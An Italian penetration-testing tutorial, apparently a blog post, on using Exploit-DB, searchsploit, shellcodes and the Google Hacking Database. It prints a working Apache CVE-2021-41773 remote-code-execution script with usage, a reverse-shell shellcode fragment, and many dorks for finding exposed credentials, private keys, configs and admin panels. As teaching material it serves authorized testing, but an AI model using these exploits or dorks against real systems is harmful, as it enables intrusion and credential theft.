guides-resources

Exploit-DB: Database di Exploit e PoC per Penetration Testing

Exploit-DB: Database di Exploit e PoC per Penetration Testing

Exploit-DB è il database pubblico di exploit e proof-of-concept per ricerca vulnerabilità e penetration test. Ricerca per CVE, software e platform.

  • Pubblicato il 2026-02-12
  • Tempo di lettura: 11 min

Executive Summary — Exploit-DB (exploit-db.com) è il più grande archivio pubblico di exploit, gestito da Offensive Security (gli stessi di Kali Linux e OSCP). Non è solo un database di exploit: è una piattaforma composta da quattro sezioni distinte — Exploits (exploit verificati), Shellcodes (payload pronti all’uso), Google Hacking Database (GHDB — dork per trovare target vulnerabili) e Papers (documentazione tecnica sulle vulnerabilità). Ogni exploit ha un EDB-ID, è collegato al CVE corrispondente, e gli exploit “verificati” sono stati testati dallo staff di Offensive Security. Searchsploit è solo il client CLI locale — la piattaforma web offre molto di più: filtri avanzati, file allegati, proof of concept e codice sorgente completo.TL;DR Exploit-DB è diviso in 4 sezioni: Exploits, Shellcodes, GHDB e Papers — ognuna con il suo workflow. La web interface ha filtri che searchsploit non ha: tipo (local/remote/webapps/DoS), piattaforma, data, verificato/non verificato. Il Google Hacking Database (GHDB) contiene migliaia di dork Google per trovare target esposti, file sensibili e pannelli admin.

Perché Exploit-DB e Non Solo “Cerca su Google” #

Quando trovi un servizio vulnerabile durante un pentest — un Apache 2.4.49, un vsFTPd 2.3.4, un Microsoft Exchange non patchato — il passo successivo è trovare un exploit funzionante. Puoi cercare su Google, ma finisci su blog, GitHub random e PoC non testati. Exploit-DB risolve questo problema:

  • Verificato: gli exploit con il badge “Verified” sono stati testati dallo staff OffSec in un ambiente controllato
  • Strutturato: ogni exploit ha metadati (CVE, piattaforma, tipo, autore, data) che permettono ricerche precise
  • Persistente: gli exploit non scompaiono — a differenza di repo GitHub che vengono cancellati
  • Legale: è un archivio per ricerca e testing autorizzato — non un marketplace

La differenza tra un pentester junior e uno senior spesso sta nel workflow di ricerca exploit: sapere dove cercare, come filtrare, cosa verificare prima di eseguire e come adattare un exploit al target specifico.

1. La Piattaforma Web — exploit-db.com #

Homepage e Navigazione #

La homepage mostra gli ultimi exploit pubblicati. La barra di navigazione principale ha quattro sezioni:

SezioneURLContenuto
Exploitsexploit-db.com/exploitsExploit verificati e non, PoC, codice sorgente
Shellcodesexploit-db.com/shellcodesPayload per diverse architetture e OS
GHDBexploit-db.com/google-hacking-databaseDork Google per trovare target
Papersexploit-db.com/papersWhite paper, analisi tecniche, guide

Ricerca Avanzata — Exploits #

La ricerca web ha filtri che searchsploit non espone:

text
URL: https://exploit-db.com/search

Filtri disponibili:
- Text: termine di ricerca libero (es: "Apache 2.4.49")
- Type: local, remote, webapps, dos, shellcode
- Platform: Windows, Linux, Multiple, PHP, Python, Java, Hardware...
- Author: autore dell'exploit
- Port: porta del servizio (es: 80, 443, 21)
- Tag: CVE-XXXX-XXXX
- Verified: solo exploit verificati da OffSec
- Has App: exploit con applicazione vulnerabile allegata
- Date range: da/a

Esempio pratico — cerchi un exploit per Apache 2.4.49:

text
Text: Apache 2.4.49
Type: remote
Platform: Linux
Verified: Yes

Risultato:

text
EDB-ID: 50383
Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution
CVE: CVE-2021-41773
Type: remote
Platform: Multiple
Verified: Yes
Author: Lucas Souza
Date: 2021-10-05

Anatomia di una Pagina Exploit #

Ogni exploit ha una pagina dedicata con queste informazioni:

text
EDB-ID:        50383                          ← Identificatore univoco
CVE:           CVE-2021-41773                 ← Collegamento al CVE
Author:        Lucas Souza                    ← Chi l'ha scritto
Type:          webapps                        ← Categoria
Platform:      Multiple                       ← Sistema target
Date:          2021-10-05                     ← Data di pubblicazione
Verified:      ✓                              ← Testato da OffSec
Exploit:       [codice sorgente completo]     ← Il PoC

Sotto il codice, spesso trovi:

  • Descrizione: come funziona la vulnerabilità
  • Versioni affette: range di versioni vulnerabili
  • Istruzioni: come compilare/eseguire l’exploit
  • References: link a advisory, patch, blog post tecnici

Come Leggere un Exploit Prima di Eseguirlo #

Questo è il punto che separa un pentester da un script kiddie. Mai eseguire un exploit senza leggerlo. Ecco cosa cercare:

text
1. LINGUAGGIO: Python? C? Bash? Ruby? — devi avere l'interprete/compilatore
2. DIPENDENZE: import requests, from pwn import * — devi installarle
3. TARGET: l'exploit è per la versione esatta del tuo target?
4. PARAMETRI: IP, porta, path, payload — cosa devi configurare?
5. PAYLOAD: cosa fa l'exploit? Reverse shell? File read? DoS?
   ⚠️ Cerca: os.system, subprocess, exec, eval — comandi che esegue
   ⚠️ Cerca: socket.connect — a chi si connette (callback attacker)
   ⚠️ Cerca: hardcoded IP/port — devi cambiarli con i tuoi
6. SIDE EFFECTS: crash del servizio? File scritti? Utenti creati?
7. CLEANUP: l'exploit pulisce dopo di sé o lascia tracce?

Esempio — leggi un exploit Python:

python
#!/usr/bin/python3
# Exploit Title: Apache 2.4.49 - Path Traversal & RCE
# CVE: CVE-2021-41773
# Author: Lucas Souza

import requests
import sys

if len(sys.argv) < 2:
    print("Usage: python3 exploit.py <target_url> <command>")
    sys.exit(1)

url = sys.argv[1]
cmd = sys.argv[2]

# Path traversal payload
path = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = f"echo; {cmd}"

r = requests.post(f"{url}{path}", headers=headers, data=data)
print(r.text)

Analisi:

  • Linguaggio: Python 3, richiede requests
  • Parametri: URL del target e comando da eseguire
  • Payload: path traversal che raggiunge /bin/sh ed esegue il comando
  • Side effects: nessun crash, nessun file scritto — è un RCE non persistente
  • Rischio: basso — esegue un singolo comando e mostra l’output

2. Le Quattro Sezioni in Dettaglio #

Sezione 1: Exploits #

La sezione principale. Ogni exploit è categorizzato per tipo:

TipoSignificatoEsempio
remoteEseguibile da remoto senza accesso al sistemaRCE via rete
localRichiede accesso locale al sistema (privesc)Kernel exploit Linux
webappsVulnerabilità in applicazioni webSQLi, XSS, RCE in CMS
dosDenial of ServiceCrash del servizio
shellcodePayload (link alla sezione Shellcodes)Reverse shell assembly

Workflow operativo per cercare exploit:

text
1. Hai trovato: Apache 2.4.49 su Linux
2. Vai su exploit-db.com → Search
3. Cerca: "Apache 2.4.49" → Type: remote → Verified: Yes
4. Risultato: EDB-50383 (Path Traversal + RCE)
5. Leggi il codice → verifica che sia per la tua versione
6. Scarica → adatta parametri (target IP, porta, callback)
7. Testa in lab → poi sul target autorizzato

Scaricare l’exploit:

bash
# Dalla web interface: click su "Download" o "Raw"

# Via URL diretta:
curl -o exploit.py "https://www.exploit-db.com/raw/50383"

# Via searchsploit (se disponibile nel mirror locale):
searchsploit -m 50383

Sezione 2: Shellcodes #

La sezione Shellcodes contiene payload in assembly/bytecode pronti all’uso, organizzati per architettura e OS:

CategoriaEsempi
Linux x86Reverse shell, bind shell, execve /bin/sh
Linux x86_64Reverse shell, bind shell, mmap + exec
Windows x86Reverse shell, bind shell, add admin user
Windows x64Reverse shell, download + exec
ARMReverse shell, bind shell
MIPSReverse shell (per router/IoT)

Quando servono gli Shellcodes di Exploit-DB:

  • Stai sviluppando un buffer overflow custom e hai bisogno di un payload testato
  • msfvenom non genera payload per l’architettura che ti serve (MIPS, ARM embedded)
  • Vuoi un payload senza dipendenze da Metasploit
  • Stai studiando come funzionano i payload a basso livello

Esempio — cerchi un reverse shell Linux x86_64:

text
Sezione: Shellcodes
Search: "reverse shell"
Platform: Linux x86_64

Risultato:

text
Shellcode ID: 50253
Title: Linux/x86_64 - Reverse Shell (127.0.0.1:4444/TCP) Shellcode (82 bytes)
Platform: Linux x86_64
Size: 82 bytes

Il codice contiene il bytecode pronto:

c
char shellcode[] = 
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
"\x48\x97\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01"
// ... (82 bytes totali)

Per adattarlo al tuo IP e porta, devi modificare i byte dell’indirizzo e della porta nel bytecode (o ricompilare dal sorgente assembly).

Sezione 3: Google Hacking Database (GHDB) #

La GHDB è una collezione di Google dork — query di ricerca avanzate che trovano pagine web con informazioni sensibili o configurazioni vulnerabili indicizzate da Google.

Categorie GHDB:

CategoriaCosa trovaEsempio dork
FootholdsPagine di login, pannelli adminintitle:"admin login" inurl:/admin
Files with UsernamesFile con nomi utentefiletype:log inurl:"/users"
Sensitive DirectoriesDirectory listing aperteintitle:"Index of" "backup"
Web Server DetectionServer con versione espostaintitle:"Apache Status" "Server Version"
Vulnerable FilesFile di configurazione espostifiletype:env "DB_PASSWORD"
Vulnerable ServersServer con vulnerabilità noteintitle:"phpMyAdmin" "Welcome to phpMyAdmin"
Error MessagesMessaggi di errore con info sensibili"SQL syntax" "mysql_fetch" filetype:php
Network or Vulnerability DataDati di rete esposti"Network Vulnerability Assessment Report"
Pages with Login PortalsPortali di accessoinurl:"/remote/login" "FortiGate"
Various Online DevicesDispositivi IoT/SCADA espostiintitle:"webcamXP" inurl:8080
Advisories and VulnerabilitiesAdvisory non pubblici"confidential" filetype:pdf "vulnerability assessment"

Workflow operativo GHDB:

text
1. Sei in fase di OSINT su target corp.local
2. Vai su exploit-db.com/google-hacking-database
3. Cerca per categoria: "Files Containing Passwords"
4. Trova dork: filetype:env "DB_PASSWORD" site:corp.local
5. Esegui su Google (o DorkSearch.com per bulk)
6. Trovi: https://dev.corp.local/.env con credenziali DB

Dork GHDB più utili per il pentest:

text
# File .env esposti (credenziali)
filetype:env "DB_PASSWORD" site:target.com

# Backup SQL esposti
filetype:sql "INSERT INTO" "password" site:target.com

# phpMyAdmin senza auth
intitle:"phpMyAdmin" "Welcome to phpMyAdmin" site:target.com

# Directory listing con backup
intitle:"Index of" "backup" site:target.com

# File di configurazione WordPress
inurl:wp-config.php.bak site:target.com

# Pannelli admin esposti
inurl:/admin intitle:"login" site:target.com

# Errori SQL con info database
"You have an error in your SQL syntax" site:target.com

# File SSH key esposti
filetype:pem "PRIVATE KEY" site:target.com

# VPN config esposti
filetype:ovpn "remote" site:target.com

# Git repository esposti
intitle:"Index of" ".git" site:target.com

Google Dork per Exploit-DB stesso:

text
# Cerca exploit per un prodotto specifico su Google
site:exploit-db.com "Apache 2.4.49" "remote"

Sezione 4: Papers #

La sezione Papers contiene documenti tecnici — white paper, analisi di vulnerabilità, guide a tecniche di exploitation e ricerca. Non sono exploit eseguibili ma documentazione che spiega il “come” e il “perché”.

Categorie Papers:

CategoriaContenuto
Buffer OverflowTecniche di exploitation stack/heap
Web ApplicationSQLi avanzata, XSS, SSRF, deserialization
NetworkMitM, protocol exploitation, wireless
CryptographyAttacchi a implementazioni crypto
Reverse EngineeringAnalisi malware, firmware
Privilege EscalationTecniche Windows/Linux privesc

Quando usare Papers: quando hai bisogno di capire una tecnica in profondità prima di applicarla. Un exploit ti dice “cosa fare”, un paper ti dice “perché funziona”.

3. Searchsploit — Il Client CLI Locale #

Searchsploit è il client da riga di comando che cerca nel mirror locale di Exploit-DB. È preinstallato su Kali Linux. Il vantaggio: funziona offline. Lo svantaggio: i filtri sono meno potenti della web interface.

Ricerca base #

bash
searchsploit apache 2.4.49

Output:

text
--------------------------------------------- ---------------------------------
 Exploit Title                               |  Path
--------------------------------------------- ---------------------------------
Apache HTTP Server 2.4.49 - Path Traversal & | exploits/multiple/webapps/50383.py
Apache HTTP Server 2.4.49/2.4.50 - Remote Co | exploits/multiple/webapps/50512.py
--------------------------------------------- ---------------------------------

Ricerca con filtri #

bash
# Solo exploit verificati e remote
searchsploit -t apache 2.4 --type remote

# Escludi risultati DoS
searchsploit apache 2.4 --exclude="Denial of Service"

# Cerca per CVE
searchsploit --cve 2021-41773

# Cerca per EDB-ID
searchsploit --edb 50383

# Output in JSON (per scripting)
searchsploit apache 2.4.49 -j

Operazioni sugli exploit #

bash
# Copia exploit nella directory corrente
searchsploit -m 50383
# Output: Exploit: exploits/multiple/webapps/50383.py
#         Copied to: /home/kali/50383.py

# Mostra il path completo
searchsploit -p 50383
# Output: Path: /usr/share/exploitdb/exploits/multiple/webapps/50383.py

# Apri nel browser la pagina Exploit-DB
searchsploit -w apache 2.4.49
# Output: URL: https://www.exploit-db.com/exploits/50383

# Leggi il codice senza copiare
searchsploit -x 50383
# Apre l'exploit in $PAGER (less)

Aggiorna il database locale #

bash
searchsploit -u
# Aggiorna il mirror locale da exploit-db.com
# Richiede connessione Internet

Limitazioni di searchsploit vs web #

FunzionalitàsearchsploitWeb
Ricerca testo
Filtro tipo (remote/local)Limitato
Filtro piattaformaLimitato
Filtro verificatoNo
Filtro dataNo
Filtro portaNo
File allegatiNo
ShellcodesParziale
GHDBNo
PapersNo
Funziona offlineNo

Regola pratica: usa searchsploit per la ricerca rapida durante un engagement. Usa la web interface quando hai bisogno di filtri precisi, vuoi verificare i dettagli o cerchi nella GHDB.

4. Workflow Operativo Completo — Dal Servizio all’Exploit Funzionante #

Questo è il workflow che dovresti seguire ogni volta che trovi un servizio potenzialmente vulnerabile.

Step 1: Identifica il servizio #

bash
nmap -sV -sC -p 80 10.10.10.40
# Apache/2.4.49 (Ubuntu)

Step 2: Cerca exploit — multi-source #

bash
# 1. Searchsploit (locale, veloce)
searchsploit apache 2.4.49

# 2. Web Exploit-DB (filtri avanzati)
# https://exploit-db.com → "Apache 2.4.49" → Type: remote → Verified: Yes

# 3. Google (per PoC GitHub e blog)
# "Apache 2.4.49 exploit" OR "CVE-2021-41773 PoC"

# 4. GitHub (PoC recenti)
# github.com/search?q=CVE-2021-41773

# 5. NVD (dettagli CVE)
# nvd.nist.gov/vuln/detail/CVE-2021-41773

Step 3: Valuta l’exploit #

text
Checklist di valutazione:
□ È per la versione ESATTA del target?
□ È verificato (badge OffSec)?
□ Il codice è leggibile e comprensibile?
□ Quali dipendenze ha?
□ Che tipo di accesso dà? (RCE, file read, DoS)
□ Ha side effects? (crash, file creati, log)
□ È stato aggiornato di recente? (data)
□ Ci sono commenti/note dell'autore?

Step 4: Prepara l’exploit #

bash
# Copia nella tua directory di lavoro
searchsploit -m 50383
cd /home/kali/pentest/

# Leggi il codice
cat 50383.py

# Installa dipendenze
pip install requests  # se necessario

# Adatta i parametri
# Cerca: RHOST, RPORT, LHOST, LPORT, callback, target URL
# Modifica con i tuoi valori

Step 5: Testa in lab (se possibile) #

bash
# Se hai un lab:
docker run -d -p 8080:80 httpd:2.4.49
python3 50383.py http://127.0.0.1:8080 "id"
# Verifica che funzioni prima di usarlo sul target

Step 6: Esegui sul target autorizzato #

bash
python3 50383.py http://10.10.10.40 "id"

Output:

text
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Step 7: Documenta #

text
Nel report:
- EDB-ID: 50383
- CVE: CVE-2021-41773
- Target: 10.10.10.40:80 (Apache 2.4.49)
- Impatto: Remote Code Execution come www-data
- Remediation: aggiornare Apache a 2.4.51+

5. Tecniche Avanzate con Exploit-DB #

Adattare un exploit che non funziona #

La maggior parte degli exploit non funzionano “out of the box” sul tuo target. Ecco i motivi più comuni e come risolvere:

ProblemaCausaFix
Connection refusedPorta o IP sbagliati nell’exploitModifica RHOST/RPORT
Exploit failedVersione leggermente diversaLeggi il codice, trova l’offset o il path che cambia
ModuleNotFoundErrorDipendenza Python mancantepip install [modulo]
Segfault (buffer overflow)Offset sbagliato per il targetRicalcola offset con pattern_create / pattern_offset
400 Bad RequestPath o header dell’exploit non correttiConfronta con la documentazione della CVE
Exploit per Python 2Scritto per Python 2 (print senza parentesi)2to3 exploit.py o adatta manualmente
Exploit per Windows, target LinuxPiattaforma sbagliataCerca un exploit per la piattaforma corretta

Cross-reference CVE ↔ EDB-ID #

bash
# Da CVE a EDB-ID
searchsploit --cve 2021-41773

# Da EDB-ID a CVE: apri la pagina web
searchsploit -w 50383
# Nella pagina web: il CVE è indicato nei metadati

Bulk search durante un engagement #

bash
# Hai una lista di servizi dal nmap scan:
# Apache 2.4.49, OpenSSH 8.2, vsftpd 3.0.3, ProFTPD 1.3.5

# Cerca tutto in sequenza
for service in "Apache 2.4.49" "OpenSSH 8.2" "vsftpd 3.0.3" "ProFTPD 1.3.5"; do
  echo "=== $service ==="
  searchsploit "$service" --type remote
  echo ""
done

Exploit-DB + Metasploit #

Molti exploit di Exploit-DB hanno un modulo Metasploit corrispondente. Il collegamento è bidirezionale:

bash
# Nella pagina Exploit-DB: sezione "References" → link a Metasploit module

# In Metasploit: cerca per CVE
msf6 > search cve:2021-41773
# Matching Modules
# exploit/multi/http/apache_normalize_path_rce  2021-10-07  excellent

# Confronto:
# - Exploit-DB: script standalone, leggero, personalizzabile
# - Metasploit: modulo integrato, gestisce payload/handler, ma più pesante

Exploit-DB Bin Sploits #

Alcuni exploit hanno file binari allegati (compilati, non sorgente) nella sezione “Bin Sploits” (files.exploit-db.com). Questi sono PoC che richiedono un ambiente specifico per la compilazione o che sono distribuiti come binario.

bash
# Download bin sploit
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/50383.zip

⚠️ Attenzione massima con i binari: non puoi leggere il codice sorgente. Esegui solo in lab isolato. Preferisci sempre il codice sorgente.

6. GHDB Operativo — Workflow Completo #

Recon su un target specifico #

bash
# Step 1: File sensibili
"DB_PASSWORD" site:target.com
filetype:env site:target.com
filetype:sql "password" site:target.com

# Step 2: Directory listing
intitle:"Index of" site:target.com
intitle:"Index of" "backup" site:target.com
intitle:"Index of" ".git" site:target.com

# Step 3: Pannelli admin
inurl:/admin site:target.com
inurl:/wp-admin site:target.com
intitle:"login" inurl:/admin site:target.com

# Step 4: Errori informativi
"error" "mysql" site:target.com
"stack trace" site:target.com
"Exception" filetype:log site:target.com

# Step 5: Documenti interni
filetype:pdf "confidential" site:target.com
filetype:xlsx "password" site:target.com
filetype:doc "internal" site:target.com

Recon generica (senza target specifico) #

bash
# Trova telecamere esposte
intitle:"webcamXP 5" inurl:8080

# Trova stampanti esposte
intitle:"HP LaserJet" inurl:hp/device/this.LCDispatcher

# Trova NAS esposti
intitle:"QNAP" inurl:/cgi-bin/

# Trova database esposti
intitle:"phpMyAdmin" "Welcome to phpMyAdmin" -site:phpmyadmin.net

# Trova FortiGate VPN login
inurl:"/remote/login" intitle:"FortiGate"

# Trova Citrix Gateway
inurl:"/vpn/index.html" intitle:"Citrix"

Tool per Google Dorking automatizzato #

ToolFunzione
pagodoAutomatizza GHDB dork su Google (github.com/opsdisk/pagodo)
Dorksearch.comInterfaccia web per GHDB con preview
GooFuzzFuzzing basato su Google dork
theHarvesterOSINT con integrazione dork

7. Confronto con Altre Fonti di Exploit #

FonteProControQuando usare
Exploit-DBVerificati, strutturati, persistentiNon sempre il più recenteStandard per qualsiasi ricerca
GitHubPoC più recenti, codice aggiornatoNon verificati, possono sparireCVE recenti (<6 mesi)
PacketStormAmpio archivio, advisory dettagliatiMeno strutturato di EDBRicerca secondaria
NVD/NISTCVE ufficiali, CVSS score, CPENo exploit, solo descrizioneValutazione rischio
MetasploitExploit + payload + handler integratiSolo exploit con modulo MSFQuando serve automazione
Nuclei TemplatesScanner automatico per CVESolo detection, non exploitationScansione massiva
VulnHub/HackTheBoxLab con exploit reali da praticareNon exploit databaseStudio e pratica

Workflow multi-source per un CVE:

text
1. NVD → capisco la vulnerabilità (CVSS, versioni affette, advisory)
2. Exploit-DB → cerco exploit verificato (searchsploit --cve XXXX)
3. GitHub → cerco PoC recenti (search "CVE-XXXX-XXXX")
4. Metasploit → verifico se esiste un modulo (search cve:XXXX)
5. Google → cerco blog tecnici con analisi dettagliata

8. Troubleshooting #

ProblemaCausaFix
searchsploit non trova nullaDatabase locale non aggiornatosearchsploit -u
searchsploit trova troppi risultatiRicerca troppo genericaAggiungi versione esatta: searchsploit "apache 2.4.49" (con virgolette)
Exploit Python non funzionaPython 2 vs 3Controlla shebang (#!/usr/bin/python vs python3), usa 2to3
Exploit C non compilaDipendenze mancantiLeggi i commenti in cima al file per i flag di compilazione
Exploit “verified” ma non funzionaVersione target leggermente diversaL’exploit è verificato per una versione specifica — adattalo
GHDB dork non trova nullaGoogle ha de-indicizzato o il target non è indicizzatoProva varianti del dork, usa operatori diversi

9. FAQ #

D: Exploit-DB è legale? R: Sì. Exploit-DB è un archivio per ricerca di sicurezza. Scaricare e leggere exploit è legale. Usarli contro sistemi senza autorizzazione è illegale. Lo stesso principio di un libro di chimica: il contenuto è legale, l’uso improprio no.

D: “Verified” significa che funziona sempre? R: No. “Verified” significa che lo staff OffSec l’ha testato con successo in un ambiente controllato specifico. Il tuo target potrebbe avere una versione leggermente diversa, patch parziali o configurazione diversa. Verified riduce il rischio di exploit fake/malevoli, non garantisce il funzionamento universale.

D: Come faccio a sapere se un exploit è sicuro da eseguire? R: Leggilo. Tutto. Cerca comandi distruttivi (rm -rf, format, drop table), callback verso IP non tuoi, download di binari esterni. Se non capisci il codice, non eseguirlo. Se è un binario senza sorgente, eseguilo solo in lab isolato.

D: Searchsploit vs web — quale uso? R: Searchsploit per la ricerca rapida durante un engagement (funziona offline, veloce). Web per ricerca precisa con filtri avanzati, GHDB, Papers e Shellcodes. Idealmente: searchsploit per trovare il candidato, web per verificare i dettagli.

10. Cheat Sheet Finale #

Searchsploit #

AzioneComando
Cercasearchsploit [termine]
Cerca per CVEsearchsploit --cve [CVE-ID]
Solo remotesearchsploit [termine] --type remote
Escludi DoSsearchsploit [termine] --exclude="Denial of Service"
Copia exploitsearchsploit -m [EDB-ID]
Mostra pathsearchsploit -p [EDB-ID]
Apri nel browsersearchsploit -w [termine]
Leggi codicesearchsploit -x [EDB-ID]
Output JSONsearchsploit [termine] -j
Aggiorna DBsearchsploit -u

Web Interface #

AzioneURL
Ricerca exploitexploit-db.com/search?q=[termine]
Pagina exploitexploit-db.com/exploits/[EDB-ID]
Raw codeexploit-db.com/raw/[EDB-ID]
Downloadexploit-db.com/download/[EDB-ID]
GHDBexploit-db.com/google-hacking-database
Shellcodesexploit-db.com/shellcodes
Papersexploit-db.com/papers

GHDB — Dork Essenziali #

ObiettivoDork
File .envfiletype:env "DB_PASSWORD" site:[target]
SQL dumpfiletype:sql "INSERT INTO" "password" site:[target]
Git espostointitle:"Index of" ".git" site:[target]
Backupintitle:"Index of" "backup" site:[target]
phpMyAdminintitle:"phpMyAdmin" "Welcome" site:[target]
Admin panelinurl:/admin intitle:"login" site:[target]
Errori SQL"SQL syntax" "mysql" site:[target]
SSH keyfiletype:pem "PRIVATE KEY" site:[target]
VPN configfiletype:ovpn site:[target]
Documentifiletype:pdf "confidential" site:[target]

Workflow Rapido #

text
Servizio trovato → searchsploit "[servizio] [versione]"
                 → exploit-db.com (filtri avanzati)
                 → leggi il codice → verifica versione
                 → adatta parametri → testa in lab
                 → esegui su target autorizzato → documenta

OPSEC #

Searchsploit è locale — nessun traffico di rete. La ricerca su exploit-db.com è loggata dal sito (come qualsiasi sito web). I Google dork su GHDB sono loggati da Google e possono generare CAPTCHA se fatti in massa. Usa tool come pagodo con proxy/VPN per il dorking automatizzato. L’esecuzione dell’exploit è l’azione più visibile — documenta tutto per il report.


Riferimento: Offensive Security Exploit Database, Google Hacking for Penetration Testers (Johnny Long). Uso esclusivo in ambienti autorizzati.

hackita.it/supportohackita.it/servizi.

#poc #vulnerability-research

DIVENTA PARTE DELL’ÉLITE DELL’HACKING ETICO.

Accedi a risorse avanzate, lab esclusivi e strategie usate dai veri professionisti della cybersecurity.

Non sono un robot

Iscrivendoti accetti di ricevere la newsletter di HACKITA. Ti puoi disiscrivere in qualsiasi momento.